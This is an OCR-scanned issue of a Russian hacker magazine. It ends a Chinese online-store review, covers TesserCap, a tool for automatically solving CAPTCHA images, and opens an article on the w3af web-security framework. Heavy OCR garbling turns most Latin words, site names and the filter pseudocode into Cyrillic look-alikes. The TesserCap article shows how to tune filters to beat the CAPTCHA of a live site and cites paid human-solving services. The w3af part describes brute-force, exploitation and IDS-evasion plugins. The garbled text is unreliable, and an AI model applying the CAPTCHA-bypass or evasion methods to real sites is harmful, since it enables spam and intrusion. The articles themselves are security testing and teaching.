Вывод: отличный магазин с широким ас- 
сортиментом, адекватные сервис и поддерж- 
ка — например, если при получении чего-то 
не хватает, то после обращения обычно без 
проблем высылают недостающее. 



040 
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в Китай за покупками? 
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РапсІаѵѵіІІ.сот 

Категории товаров: шиш 
Способы оплаты: пѵ^<м — ‘ * 

Срок доставки: от 25 до 35 дней 

Еще один китайский интернет-магазин, ко- 
торый мало чем выделяется среди конкурен- 
тов. Но, на мой взгляд, магазин максимально 
адаптирован для русскоговорящих покупате- 
лей. Судя по отзывам, сегодня он один из лиде- 
ров по числу продаж в страны СНГ. На форуме 
сайта доступен активный русскоязычный 
раздел, а представитель магазина часто 
встречается с потенциальными покупателями 
на тематических русских форумах — короче 
говоря, саппорттут отменный. Из заметных 
преимуществ магазина — наибольший ассор- 
тимент телефонов (в том числе и с закосом 
под популярные марки). Один мой знакомый 
приобрел в РапбаѵѵіІІ популярную китайскую 
модель телефона и остался доволен как самой 
покупкой, так и быстрой доставкой, которая 
заняла всего десять дней. Советую не забыть 
про раздел распродаж — там действительно 
можно найти очень дешевые товары. Оплата 
через РауРаІ или картами Ѵіза и Мазіег Сагб, 
причем можно получить заметную скидку 
по купону. Доставка будет бесплатной. Един- 
ственное, что мне не понравилось, — условие 



предоставления бесплатного трек-номера: его 
можно получить только при заказе на сумму 
свыше $50 (тут по сравнению с конкурентами 
«Панда» явно проигрывает). 



Общее впечатление: отличный китайский 
магазин для русскоязычного пользователя, 
хотя инее самыми низкими ценами на попу- 
лярные товары. 



ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА 



моѵѵзиррыЕР.сом 



Категории товаров: шЕігвг 

Способы оплаты: ^ Д 

Срок доставки: от 7 до 25 дней 

Многие люди успешно приобретали в этом 
магазине планшеты и прочие гаджеты, 
но у меня был печальный опыт: заказав 
и оплатив телефон, я получил модель с 
урезанным функционалом (на $30 дешевле) 
и не того цвета. Печален даже не сам факт 
отправки не той модели, а то, что все попытки 
как-то решить проблему не увенчались 
успехом. Возможно, через РауРаІ было бы 
проще открыть диспут, но не факт. 



МЕРІМ0ВІІЕ5.С0М 

Категории товаров: |І|Е1 
Способы оплаты: 

Срок доставки: от 14 до 25 дней 

Интернет-магазин от предприимчивых 
американцев. Посылки приходят из Китая, 
хотя в поддержке работают одни «штатовцы». 
Заказывал у них по мелочи — чехол, 36-модем 
и стилусы. Каку всякого уважающего себя 
китайского магазина, оплата через Рау- 
РаІ и бесплатная доставка присутствуют, 
но посылки отправляютобычной почтой и без 
трекинга. 



ВЦУІМС0ІМ5.С0М 

Категории товаров; ІІІЕ1ВП 

Способы оплаты: ПуЛі* ^В 

Срок доставки: от 7 до 25 дней 

Порадовала весьма быстрая (и, кстати, 
бесплатная) доставка, особенно учитывая 
предновогодние дни. По широте ассортимента 
сайт не уступает конкурентам. Из нареканий 
— только периодические лаги сайта. Если 
бы не это, то магазин занял бы достойное 
место рядом с моими фаворитами РосаІРгісе 
и ТіпуОеаІ. 



ЗАКЛЮЧЕНИЕ 

В заключение хочется добавить, что один и тот 
же товар может быть во многих магазинах, 
но по разным ценам. Поэтому сначала сравни 
и только потом совершай заказ. Не поленись 
поискать в Сети купоны на скидку, с ними 



можно сэкономить. Если товар без отзывов — 
обязательно уточняй комплектацию и харак- 
теристики: нередко присылают нечто отличное 
отуказанного в описании. Чтобы максимально 
обезопасить себя, оплату лучше проводить 
через РауРаІ. В случае проблем обязательно 



обращайся в службу поддержки. Не забывай: 
китайские интернет-магазины лишь для тех, 
кто может ждать. Если что-то нужно здесь и 
сейчас, то лучше сюда даже не заглядывать. И 
главное правило: тот, кто ищет, всегда найдет. 
Удачных покупок! 
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Гурсев Сингх Калра ( дигзеѵ.каігай^оипсізіопе.сопп ) 




Проверка 
на прочность 



ТЕСТИРУЕМ 
УНИВЕРСАЛЬНУЮ 
РАСПОЗНАВАЛКУ 
САРТСНА 



Есть разные способы для обхода 
САРТСНА, которыми защищены 
сайты. Во-первых, существуют 
специальные сервисы, 
которые используют дешевый 
ручной труд и буквально за $1 
предлагают решить 1000 капч. 

В качестве альтернативы 
можно попробовать написать 
интеллектуальную систему, 
которая по определенным 
алгоритмам будет сама 
выполнять распознавание. 
Последнее теперь можно 
реализовать с помощью 
специальной утилиты. 



РЕШИТЬ САРТСНА 

Распознавание САРТСНА — задача чаще всего 
нетривиальная. На изображение необходимо 
накладывать массу различных фильтров, что- 
бы убрать искажения и помехи, которыми раз- 
работчики желаютукрепить стойкость защиты. 
Зачастую приходится реализовывать обучае- 
мую систему на основе нейронных сетей (это, 
к слову, не так сложно, как может показать- 
ся), чтобы добиться приемлемого результата 
по автоматизированному решению капч. Чтобы 
понять, о чем я говорю, лучше поднять архив 
и прочитать замечательные статьи «Взлом 
САРТСНА: теория и практика. Разбираемся, 
как ломают капчи» и «Подсмотрим и распозна- 



Схема анализа САРТСНА-изображений с помощью ТеззегСар 



ем. Взлом СаркЬа-фильтров» из #135 и #126 
номеров соответственно. Сегодня же я хочу 
рассказать тебе о разработке ТеззегСар, кото- 
рую автор называетуниверсальной решалкой 
САРТСНА. Любопытная штука, как ни крути. 

ПЕРВЫЙ ВЗГЛЯД НАТЕ55ЕРСАР 

Что сделал автор программы? Он посмотрел, 
как обычно подходят к проблеме автоматизи- 
рованного решения САРТСНА и попробовал 
обобщить этот опыт в одном инструменте. 
Автор заметил, что для удаления шумов с изо- 
бражения, то есть решения самой сложной 
задачи при распознавании капч, чаще всего 
применяются одни и те же фильтры. Получает- 
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ся, что если реализовать удобный инструмент, 
позволяющий без сложных математических 
преобразований накладывать фильтры на изо- 
бражения, и совместить его с ОСР-системой 
для распознавания текста, то можно получить 
вполне работоспособную программу. Это, 
собственно, и сделал Гурсев Сингх Калра 
из компании МсАІ'ее. Зачем это было нужно? 
Автор утилиты решил таким образом про- 
верить, насколько безопасны капчи крупных 
ресурсов. Для тестирования были выбраны те 
интернет-сайты, которые являются самыми 
посещаемыми по версии известного сервиса 
статистики ѵѵѵѵѵѵ.диапказСсоппЛор-зіІез-І . 
Кандидатами на участие в тестировании стали 
такие монстры, как ѴѴікіресІіа, еВау, а также 
провайдер капч геСаркЬа. 

Если рассматривать в общих чертах 
принцип функционирования программы, то он 
достаточно прост. Исходная капча поступает 
в систему предварительной обработки изо- 
бражений, очищающей капчу от всяких шумов 
и искажений и по конвейеру передающей по- 
лученное изображение ОСР-системе, которая 
старается распознать текст на нем. ТеззегСар 
имеет интерактивный графический интерфейс 
и обладает следующими свойствами: 

1. Имеетуниверсальную систему предвари- 
тельной обработки изображений, которую 
можно настроить для каждой отдельной 
капчи. 

2. Включаете себя систему распознавания 
Теззегасі, которая извлекаеттекстиз пред- 
варительно проанализированного и под- 
готовленного САРТСНА-изображения. 

3. Поддерживаетиспользование различных 
кодировок в системе распознавания. 

Думаю, общий смысл понятен, поэтому 
предлагаю посмотреть, как это выглядит. 
Универсальность утилиты не могла не приве- 
сти к усложнению ее интерфейса, поэтому окно 
программы может ввести в небольшой ступор. 
Так что, перед тем как переходить непосред- 
ственно к распознаванию капч, предлагаю 
разобраться с ее интерфейсом и заложенным 
функционалом. 




Предварительная обработка изображений и извлечение 
текста из капчи 



ИНТЕРФЕЙС. ВКЛАДКА МАІМ 

После запуска программы перед нами пред- 
стает окно с тремя вкладками: Маіп, Орііопз, 
Ітаде Ргергосеззіпд. Основная вкладка 
содержит элементы управления, которые 
используются для запуска и остановки теста 
САРТСНА-изображения, формирования ста- 
тистики теста (сколько отгадано, а сколько 
нет), навигации и выбора изображения для 
предварительной обработки. В поле для ввода 
СІРЕ-адреса должен быть указан точный СІРЕ- 
адрес, который веб-приложение использует 
для извлечения капч. СІРІ-адрес можно по- 
лучить следующим образом: кликнув правой 
кнопкой мыши по САРТСНА-изображению, 
скопировать или просмотреть код страницы 
и извлечь СІРІ-адрес из атрибута зге тега изо- 
бражения <ітд>. Например, в случае с хакер, 
ги это адрес ѵѵѵѵѵѵ.хакер.ги/соттоп/гаіеіі/ 
саркЬа.а5р?пате=хакер.ги. Рядом со стро- 
кой адреса находится элемент, задающий 
количество капч, которые нужно загрузить 
для тестирования. Так как приложение может 
одновременно показывать только 12 изо- 
бражений, в нем предусмотрены элементы 
управления для постраничного пролистывания 
загруженных капч. Таким образом, при мас- 
штабном тестировании мы сможем проли- 
стывать загруженные капчи и просматривать 
результаты их распознавания. Кнопки 5іагІ 
и 5іор запускают и останавливают тестиро- 
вание соответственно. После тестирования 



ОБ АВТОРЕ 






Мы не могли не сказать хотя бы пары слов об 
авторе замечательной утилиты ТеззегСар. 

Его зовут Гурсев Сингх Калра. Он работает 
главным консультантом в подразделении 
профессиональных услуг Еоипсізіопе, которое 
входит в состав компании МсА^ее. Гурсев 
выступал на таких конференциях, как Тоог- 
Соп, МиІІСоп и СІиЬНаск. Является автором 
инструментов ТеззегСар и 5515таг1. Помимо 
этого, разработал несколько инструментов для 
внутренних нужд компании. Любимые языки 
программирования — РиЬу, РиЬу оп Раііз и С#. 



Подразделение профессиональных услуг 
Роипсізіопе®, в котором он трудится, предлагает 
организациям экспертные услуги и обучение, 
обеспечивает постоянную и действенную 
защиту их активов от самых серьезных угроз. 
Команда подразделения профессиональных 
услуг состоит из признанных экспертов 
в области безопасности и разработчиков, 
имеющих богатый опыт сотрудничества 
с международными корпорациями 
и государственными организациями 
по вопросам безопасности. 




Результат анализа капчи хакер. ги с предварительной 
обработкой изображений. Судя по результатам, фильтр 
подобрать не удалось 

нужно оценить результаты распознавания 
изображений, отметив каждый из них как 
корректный или некорректный. Ну и послед- 
няя, наиболее значимая функция служит для 
передачи любого изображения в систему пред- 
варительной обработки, в которой задается 
фильтр, удаляющий с изображения шумы и ис- 
кажения. Чтобы передать картинку в систему 
предварительной обработки, надо щелкнуть 
на требуемом изображении правой кнопкой 
мыши и в контекстном меню выбрать пункт 
5епс1 То Ітаде Ргергосеззог. 

ИНТЕРФЕЙС. ВКЛАДКА 0РТІ0М5 

Вкладка опций содержит различные элементы 
управления для конфигурирования ТеззегСар. 
Здесь можно выбрать ОСР-систему, задать 
параметры веб-прокси, включить переадре- 
сацию и предварительную обработку изобра- 
жений, добавить пользовательские НТТР- 
за головки, а также указать диапазон символов 
для системы распознавания: цифры, буквы 
в нижнем регистре, буквы в верхнем регистре, 
специальные символы. 

Теперь о каждой опции поподробней. 
Прежде всего, можно выбрать ОСР-систему. 
По умолчанию доступна только одна — 
ТеззегасІ-ОРС, так что заморачиваться 
с выбором тут не придется. Еще одна очень 
интересная возможность программы — вы- 
бор диапазона символов. Возьмем, напри- 
мер, капчу с хакер. ги — видно, что она не со- 
держит ни одной буквы, а состоит только 
из цифр. Так зачем намлишние символы, 
которые только увеличат вероятность некор- 
ректного распознавания? Конечно, они нам 
ни к чему, поэтому при тестировании капчи 
хакер. ги лучше указать, что она содержит 
одни цифры: Митегіез. Но что если выбрать 
СІррег Сазе? Сможет ли программа рас- 
познать капчу, состоящую из заглавных букв 
любого языка? Нет, не сможет. Программа бе- 
рет список символов, используемых для рас- 
познавания, из конфигурационных файлов, 
находящихся в\Ргодгат РіІез\РоипсІзІопе 
Ргее Тоо1з\ТеззегСар 1.0ѴеззсІаІа\сопЛдз\. 
Поясню на примере: если мы выбрали 
опции Митегіез и Еоѵѵег Сазе, то программа 
обратится к файлу Іоѵѵегпитегіс, начинаю- 
щемуся с параметра ІеззесІіІ_сЬаг_ѵѵЫіеІізЕ 
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За ним следует список символов, которые 
будут использоваться для решения капчи. 

По умолчанию в файлах содержатся только 
буквы латинского алфавита, так что для рас- 
познавания кириллицы надо заменить или 
дополнить список символов. 

Теперь немного о том, для чего нужно 
поле Нир Рериезі Неасіегз. Например, на не- 
которых веб-сайтах нужно залогиниться, для 
того чтобы увидеть капчу. Чтобы ТеззегСар 
смогла получить доступ к капче, программе 
необходимо передать в запросе НТТР такие 
заголовки, как Ассері, Соокіе и Реі^еггег 
и т. д. Используя веб-прокси (РісІсІІег, Вигр, 
СЬагІез, ѴѴеЬЗсагаЬ, Рагоз и т. д.), можно 
перехватить посылаемые заголовки запро- 
са и ввести их в поле ввода Нир Рериезі 
Неабегз. Еще одна опция, которая навер- 
няка пригодится, — это РоІІоѵѵ Ресіігесіз. 
Дело в том, что ТеззегСар по умолчанию 
не следует переадресации. Если тестовый 
ІІРЕ-адрес должен следовать переадресации 
для получения изображения, нужно выбрать 
эту опцию. 

Ну и осталась последняя опция, вклю- 
чающая/отключающая механизм предвари- 
тельной обработки изображений, который 
мы рассмотрим далее. По умолчанию 
предварительная обработка изображений 
отключена. Пользователи сначала настраи- 
вают фильтры предварительной обработ- 
ки изображений согласно тестируемым 
САРТСНА-изображениям и затем активируют 
этот модуль. Все САРТСНА-изображения, 
загружаемые после включения опции ЕпаЫе 
Ітаде Ргергосеззіпд, проходят предвари- 
тельную обработку и уже затем передаются 
в ОСР-систему Теззегасі для извлечения 
текста. 



ИНТЕРФЕЙС. ВКЛАДКА ІМА6Е 
РРЕРР0СЕ551М6Г ~^ 

Ну вот мы и добрались до самой интересной 
вкладки. Именно тут настраиваются фильтры 
для удаления с капч различных шумов и раз- 
мытий, которые стараются максимально 
усложнить задачу системе распознавания. 
Процесс настройки универсального фильтра 
предельно прост и состоит из девяти этапов. 
Изменения изображения отображаются на 
каждом этапе предварительной обработки. 
Кроме того, на странице имеется компо- 
нент проверки, который позволяет оценить 
правильность распознавания капчи при 
наложенном фильтре. Рассмотрим подробно 
каждый этап. 

Этап 1. Инверсия цвета 

На данном этапе инвертируются цвета 
пикселей для САРТСНА-изображений. Код, 
представленный ниже, демонстрирует, как это 
происходит: 

-Рог(еасІі ріхеі іп САРТСНА) 

{ 

і-р (іпѵегІіКесІ із 1:гие^ 

пеы гесі = 255 - сиггепі: гесі 
і-р (іпѵегІіВІие із ігие) 

пеы Ыие = 255 - сиггепі; Ыие 

і-р (іпѵегіСзгееп із ігие^ 

пеы ^гееп = 255 - сиггепі ^гееп 

} 

Инверсия одного или нескольких цветов 
часто открывает новые возможности для про- 
верки тестируемого САРТСНА-изображения. 

Этап 2. Изменение цвета 

На данном шаге можно изменить цветовые 
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Изменение помех при изменении различных диапазонов цветового значения пикселей в сторону белого или черного 





РЕЗУЛЬТАТ ПРОВЕРКИ 
САРТСНА НА ПОПУЛЯРНЫХ 
САЙТАХ 




Веб-сайт 


Доля распознанных капч 


ѴѴікіребіа 


20-30% 


ЕЬау 


20-30% 


геббіСсот 


20-30% 


СМВС 


>50% 


^ообпеііѵѵогк.сот 


80-90% 


баііутаіі.со.ик 


>30% 


тедаиріоаб.сот 


>80% 


раз^еЬіп.сот 


70-80% 


саѵепие.сот 


>80% 



компоненты для всех пикселей изображения. 
Каждое числовое поле может содержать 257 
(от -1 до 255) возможных значений. Для РСВ- 
компонентов каждого пикселя в зависимости 
отзначения в поле выполняются следующие 
действия: 

1. Если значение равно -1, соответствующий 
цветовой компонентно меняется. 

2. Если значение не равно -1, все найденные 
компоненты указанного цвета (красный, зе- 
леный или синий) меняются в соответствии 
с введенным в поля значением. Значение О 
удаляет компонент, значение 255 устанав- 
ливает его максимальную интенсивность 
ит.д. 

Этап 3. Градация серого (Шкала яркости) 

На третьем этапе все изображения конверти- 
руются в изображения в градациях серого. Это 
единственный обязательный этап преобразо- 
вания изображений, который нельзя про- 
пустить. В зависимости от выбранной кнопки 
выполняется одно из следующих действий, 
связанных с цветовой составляющей каждого 
пикселя: 

1. Аѵегаде ^ (Реб + бгееп + В1ие)/3. 

2. Нитап^(0.21 *Реб + 0.71 *0гееп + О.О7* 
ВІие). 

3. Аѵегадеоітіпітит апб тахітипп соіог 
сотропепіз ^ (Міпітит (Реб + бгееп + ВІие) 

+ Махітит (Реб + бгееп + ВІие))/2. 

4. Міпітит^Міпітипп (Реб + бгееп + ВІие). 

5. Махітит -> Махітит (Реб + бгееп + ВІие). 

В зависимости от интенсивности и рас- 
пределения цветовой составляющей САРТСНА 
любой из этих фильтров может улучшить 
извлекаемое изображение для дальнейшей 
обработки. 

Этап 4. Сглаживание и резкость 

Чтобы усложнить извлечение текста 
из САРТСНА-изображений, в них добавляют 
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шум в форме однопиксельных или многопик- 
сельных точек, посторонних линий и про- 
странственных искажений. При сглаживании 
изображения возрастает случайный шум, для 
устранения которого потом используются 
фильтры Вискеі или Сиіоі^і В числовом поле 
Развез следует указать, сколько раз нужно 
применить соответствующую маску изобра- 
жения перед переходом на следующий этап. 
Давай рассмотрим компоненты фильтра для 
сглаживания и повышения резкости. Доступ- 
ны два типа масок изображения: 

• Фиксированные маски. По умолчанию 
ТеззегСар имеет шесть наиболее популяр- 
ных масок изображения. Эти маски могут 
сглаживать изображение или повышать 
резкость (преобразование Лапласа). Из- 
менения отображаются сразуже после вы- 
бора маски с помощью соответствующих 
кнопок. 

• Пользовательские маски изображения. 
Юзер также может настроить пользова- 
тельские маски обработки изображений, 
вводя значения в числовые поля и нажи- 
мая кнопку 5аѵе Мазк. Если сумма коэф- 
фициентов в этих окошках меньше нуля. 



выдается ошибка и маска не применяется. 
При выборе фиксированной маски кнопку 
5а ѵе Мазк использовать не требуется. 

Этап 5. Вводим оттенки серого 

На этом этапе обработки изображения его 
пиксели могут быть окрашены в широкий 
диапазон оттенков серого. Этот фильтр ото- 
бражает распределение градаций серого 
в 20 бакетах (Ьискеі)/диапазонах. Процент 
пикселей, окрашенных в оттенки серого 
в диапазоне от 0 до 12, указан в бакете 0, 
процент пикселей, окрашенных в оттенки 
серого в диапазоне от 13 до 25, — в бакете 
1 и т. д. Пользователь может выбрать одно 
из следующих действий для каждого диа- 
пазона значений, соответствующих оттенкам 
серого: 

1. Оставить без изменения (Іеаѵе Аз Із). 

2. Заменитьбелым (ѴѴЫіе). 

3. Заменитьчерным (ВІаск). 

Благодаря этим опциям можно контроли- 
ровать различные диапазоны оттенков се- 
рого, а также сокращать/удалять шум, меняя 
оттенки серого в сторону белого или черного. 



Этап 6. Настройка отсечения (си(оП) 

Этот фильтр строит график зависимости значе- 
ния уровня серого от частоты встречаемости 
и предлагает выбрать отсечение. Принцип 
работы отсекающего фильтра показан ниже 
в псевдокоде: 

і-р (ріхеі-’з §гаузса1е ѵаіие <= Си1;о-р-Р) 
ріхеі §гаузса1е ѵаіие = (0 ОК 255) 

-> в зависимости^ от того какая опция 
выбрана (<= или => : 5е1: Еѵегѵ Ріхеі 

ЫІІІІ 1 ѵаіие <=/=> ТІігезІіоІсІ 1:о 0. 

Кетаіпіп^ 1іо 255) 

График показывает подробное распределе- 
ние пикселей САРТСНА по цветам и помогает 
удалить помехи с помощью отсечения значе- 
ний уровня серого. 

Этап 7: Обтесывание (сЬорріпд) 

После применения сглаживающего, отсекаю- 
щего, Ьискеі- и других фильтров САРТСНА- 
изображения всё еще могут быть зашумлены 
однопиксельными или многопиксельными 
точками, посторонними линиями и простран- 
ственными искажениями. Принцип работы 
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фильтра обтесывания заключается в следую- 
щем: если количество смежных пикселей, 
окрашенных в данный оттенок серого, меньше 
величины в числовом поле, фильтр обтесыва- 
ния присваивает им значение О (черный) или 
255 (белый) по выбору пользователя. При этом 
САРТСНА анализируется как в горизонталь- 
ном, так и в вертикальном направлении. 

Этап 8: Изменение ширины границы. 

Как утверждает автор утилиты, в ходе 
первоначальных исследований и разра- 
ботки ТеззегСар он неоднократно отмечал, 
что, когда САРТСНА-изображения имеют 
толстую граничную линию и ее цвет отлича- 
ется от основного фона САРТСНА, некоторые 
системы ОСР не могут распознать текст. 
Данный фильтр предназначен для обработки 
граничных линий и их изменения. Граничные 
линии с шириной, которая указана в число- 
вом поле, окрашиваются в черный или белый 
по выбору пользователя. 

Этап 9: Инверсия серого оттенка 

Этот фильтр проходит каждый пиксель и за- 



меняет его значение уровня серого новым, 
как показано ниже в псевдокоде. Инверсия 
серого проводится для подгонки изображе- 
ния под цветовые настройки ОСР-системы. 

-Рог(еасІі ріхеі іп САРТСНА) 

пеы §гаузса1е ѵа1ие^ 255 - сиггепі; 
§гаузса1е ѵаіие 

Этап 10: Проверка распознавания капчи 

Цель данного этапа — передать предвари- 
тельно обработанное САРТСНА-изображение 
ОСР-системе для распознавания. Кнопка 
5оІѵе берет изображение после фильтра 
инверсии серого, отправляет в ОСР-систему 
для извлечения текста и отображает воз- 
вращенный текст в графическом интер- 
фейсе. Если распознанный текст совпадает 
с текстом на капче, значит, мы правильно 
задали фильтр для предварительной об- 
работки. Теперь можно перейти на вкладку 
опций и включить опцию предварительной 
обработки (ЕпаЫе Ітаде Ргергосеззіпд) для 
обработки всех последующих загруженных 
капч. 



РАСПОЗНАЕМ КАПЧИ 

Ну что ж, пожалуй, мы рассмотрели все опции 
этой утилиты, и теперь неплохо было бы про- 
тестировать какую-нибудь капчу на прочность. 
Предлагаю для примера взять капчу хакер. ги. 

Итак, запускаем утилиту и идем на сайт 
журнала. Видим список свежих новостей, за- 
ходим в первую попавшуюся и пролистываем 
до места, где можно оставить свой коммента- 
рий. Ага, ком мент так просто не добавить (еще 
бы, а то бы давно уже всё заспамили) — нужно 
вводить капчу. Ну что ж, проверим, можно 
ли это автоматизировать. Копируем ІІРЕ 
картинки и вставляем его в адресную строку 
ТеззегСар. Указываем, что нужно загрузить 12 
капч, и нажимаем 5іагЕ Программа послушно 
загрузила 12 картинок и попыталась их рас- 
познать. К сожалению, все капчи оказались 
либо не распознаны, о чем свидетельствует 
надпись -РаіІесІ- под ними, либо распознаны 
неправильно. В общем, неудивительно, так 
как посторонние шумы и искажения не были 
удалены. Этим мы сейчас и займемся. Жмем 
правой кнопкой мыши на одну из 12 загру- 
женных картинок и отправляем ее в систему 
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предварительной обработки (5епс1 То Ітаде 
Ргергосеззог). Внимательно рассмотрев все 
12 капч, видим, что они содержат только циф- 
ры, поэтому идем на вкладку опций и указы- 
ваем, что распознавать нужно только цифры 
(СЬагасІег 5еІ = Митегісз). Теперь можно 
переходить на вкладку Ітаде Ргергосеззіпд 
для настройки фильтров. Сразу скажу, что 
поигравшись с первыми тремя фильтрами 
(«Инверсия цвета», «Изменение цвета», 
«Градация серого») я не увидел никакого по- 
ложительного эффекта, поэтому оставил там 
всё по дефолту. Я выбрал маску ВтооіЬ Мазк 
2 и установил количество проходов равным 
одному. Фильтр бгаузсаіе Ьискеіз я пропустил 
и перешел сразу к настройке отсечения. Вы- 
брал значение 154 и указал, что те пиксели, 
которых меньше, нужно установить в О, а те, 
которых больше, в 255. Чтобы избавиться 
от оставшихся точек, включил сЬорріпд и из- 
менил ширину границы до 10. Последний 
фильтр включать не было смысла, поэтому я 
сразу нажал на Воіѵе. 

На капче у меня было число 714945, 
но программа распознала его как 711435. 



Это, как видишь, совершенно неверно. 

В конечном итоге, как я ни бился, нормально 
распознать капчу у меня так и не получилось. 
Пришлось экспериментировать с разІеЬіп. 
сот, которые без проблем удалось рас- 
познать. Но если ты окажешься усидчивее 
и терпеливее и сумеешь получить кор- 
ректное распознавание капч с хакер. ги, то 
сразу заходи на вкладку опций и включай 
предварительную обработку изображений 
(ЕпаЫе Ітаде Ргергосеззіпд). Затем переходи 
на Маіп и, кликнув на Віагі, загружай свежую 
порцию капч, которые теперь будут пред- 
варительно обрабатываться твоим филь- 
тром. После того, как программа отработает, 
отметь корректно/некорректно распознан- 
ные капчи (кнопки Магк аз Соггесі/Магк аз 
ІпСоггесі). С этого момента можно просма- 
тривать сводную статистику по распознава- 
нию с помощью ВЬоѵѵ Віаіізіісз. В общем-то, 
это своеобразный отчет о защищенности той 
или иной САРТСНА. Если стоит вопрос о вы- 
боре того или другого решения, то с помо- 
щью ТеззегСар вполне можно провести свое 
собственное тестирование. 



ЗАКЛЮЧЕНИЕ 

САРТСНА-изображения являются одним 
из самых эффективных механизмов по защите 
веб-приложений от автоматизированного за- 
полнения форм. Однако слабые капчи смогут 
защитить от случайных роботов и не устоят 
перед целенаправленными попытками их 
решить. Как и криптографические алгоритмы, 
САРТСНА-изображения, тщательно проте- 
стированные и обеспечивающие высокий уро- 
вень безопасности, являются самым лучшим 
способом защиты. На основе статистики, 
которую привел автор программы, я выбрал 
для своих проектов геСарІсЬа и буду реко- 
мендовать ее всем своим друзьям — она ока- 
залась самой стойкой из протестированных. 

В любом случае не стоит забывать, что в Сети 
есть немало сервисов, которые предлагают 
полуавтоматизированное решение САРТСНА. 
Через специальный АРІ ты передаешь серви- 
су изображение, а тот через непродолжитель- 
ное время возвращает решение. Решает капчу 
реальный человек (например, из Китая), по- 
лучая за это свою копеечку. Тут уже никакой 
защиты нет :). ^ 
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Главное окно ѵѵЗаТ 



Проект ѵѵЗаІ" сильно выделяется среди многих 
других инструментов для исследования 
безопасности веб-приложений. Это 
не обычный сканер с жестко забитым 
функционалом, а фреймворк, позволяющий 
использовать более сотни различных плагинов 
для исследования сайта, поиска уязвимостей 
и их последующей эксплуатации. 



ЧТО ТАКОЕ ѴѴЗАР? 

Современные веб-приложения уже мало чем похожи на своих пред- 
шественников, которые были в ходу еще пять лет назад. Они стано- 
вятся всё более популярными, используют намного больше техно- 
логий, что увеличивает возможный вектор атаки, обрабатывают всё 
больше разной информации, включая финансовые и персональные 
данные. Чтобы снизить риски, мы можем внедрить процесс безопас- 
ной разработки программного обеспечения, важным этапом которого 
является тестирование безопасности. Условно говоря, можно выде- 
лить четыре вида тестирования безопасности веб-приложения: 

1 . Автоматизированное сканирование на уязвимости. 

2 . Ручноетестированиебезопасности (пентестинг). 

3 . Статический анализ кода. 

4 . Аудит кода. 

Сегодня я хочу рассказать о проекте ѵѵЗа! ( уѵЗаСога ). Это фреймворк 
для тестирования безопасности веб-приложения (ѴѴеЬ Арріісаііоп 
Аиаск апб Аисііі Ргатеѵѵогк), который может быть использован для 
первых двух видов тестирования. Автором этого открытого проекта 
является Андреас Рианчо из Аргентины. Сейчас проект разрабаты- 
вается преимущественно им и небольшой группой контрибьюторов 
со всего мира, в которую входит и автор этих строк :). В работе над 
ним также принимают активное участие такие известные компании, 
как РарісІ? и Яндекс! Фреймворк написан на РуіЬоп, который, какты 
знаешь, является «языком с батарейками». Батарейки ѵѵЗаІ" — это его 
расширения, которых набралось уже больше сотни. Это, конечно, еще 
не Мо2ІІІа РігеЬх, но уже достаточно мощное средство. 



КАК УСТРОЕН ѴѴЗАР? 

Фреймворк ѵѵЗаІ" состоит из двух важных частей: ядра и плагинов. 
Ядро запускает главный процесс и координирует работу плагинов. 
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а также обмен информации между ними. Плагины, в свою очередь, 
находят уязвимости и позволяют проэксплуатировать их. Через ядро 
плагины обмениваются информацией, к примеру, о найденных запро- 
сах для фаззинга. В качестве центрального хранилища информации 
выступаеттак называемая «база знаний». 

Слово «фреймворк» в названии разработки употребляется не слу- 
чайно. ѴѴЗаІ" предоставляет платформу, в то время как весь функцио- 
нал для пентеста реализован в разных плагинах. Для каждого нового 
сканирования ты можешь выбирать только нужные тебе аддоны, 
комбинируя их. Плагин каждого типа, которых в общей сложности на- 
считывается восемь, отвечает за выполнение определенной задачи. 

1 . Плагины для поиска возможныхточек входа в приложение (или так 
называемые сіізсоѵегу-плагины) собирают формы, ссылки и вообще 
всё, что может сгенерировать запрос к веб-приложению. Та КИМ об- 
разом формируется карта запросов тестируемого приложения. Хо- 
рошим примером такого плагина является классический веб-паук, 
реализованный в виде модуля ѵѵеЬЗрісІег. Оізсоѵегу-плагины запу- 
скаются в цикле, благодаря чему цели, обнаруженные на предыду- 
щем этапе, попадают на вход этихже плагинов на следующем этапе. 
Этот процесс продолжается до тех пор, пока не будет достигнут 
лимит, установленный для режима поиска целей для фаззинга. 

2 . Аудит-плагины используютвывод плагинов (тоестьточки входа 
в приложение) для поиска уязвимостей, которые позволяютосу- 
ществитьтакиеатаки, какХ55, 501-инъекция, (Р)ІРІ и множество 
других. 

3 . Сгер-плагины просты, новтожевремяоченьполезны, каки извест- 
ная УМІХ-утилита, в честь которой они названы. Смысл такой: через 
дгер-плагин проходиткаждая пара НТТР-запрос/ответ, в которой 
производится поискинтересующей насинформации (номера 
кредитных карт, внутренние ІР-адреса, адреса электронной почты 
ИТ. п.). Эти плагины также умеют искать участки потенциально 
опасного Эаѵа5сгірІ-кода, например: 

сІоситеп1:.ыгі1;е 
сіосишепі; . 1оса1;іоп 

еѵаі 



Подобные участки кода часто создают предпосылки для реа- 
лизации атак вида ООМ ЬазесІ Х55 ( ѵѵѵѵѵѵ.оѵѵазр.огд/іпсІех.рЬр/ 

РОМ ВазесІ Х55 І. 

4 . Вгиіеі'огсе-плагины, какможнодогадаться, производятперебор 
значений для механизмов аутентификации НТТР Вазіс и для обыч- 
ной формы для логина. Например, плагин Ьгппіодіп автоматически 
детектируетформы входа по содержанию в них двух параметров, 
один изкоторыхимееттип раззѵѵогсі. Послеобнаружениятакой 
формы сразу начинается брут. 

5 . Аиаск-плагины предназначены не для поиска брешей, а для их 
эксплуатации. Они, какидругиеаддоны, используютобщуюбазу 
знаний о тестируемом приложении, в частности, они используютин- 
формациюонайденныхуязвимостяхи пытаются ихпроэксплуати- 
ровать. Да-да, именноэти плагины могутпомочьдобытьзаветный 
шелл на бажном сервере. ;) 

6 . Мапдіе-плагины позволяютна летуменятьчто-нибудьвзапросах 



к веб-приложению и его ответах. Если опять провести аналогию 
с миром ОМІХ, это фактически эквиваленттекстового потокового 
редактора зеб, но уже для НТТР-транзакций. Заменить во всех от- 
ветахЫббеп-поля на обычныетекстовые? Пожалуйста! 

7 . Еѵазіоп-плагины используются для обхода простыхправил раз- 
личныхІРЗ.Хочешьподольшеоставаться незамеченным при про- 
ведении очередного пентеста веб-приложения?Тогда используй 
что-нибудь из этого набора. 

8 . Оиіриі-плагины выполняют простую миссию: формируют в удобо- 
читаемом виде отчеты о результатах работы ѵѵЗаЕ Выбирай, что 
тебе больше подходит — «православный» текстовый формат или 
«энтерпрайзный» РОЕ, — или по-быстрому напиши более под- 
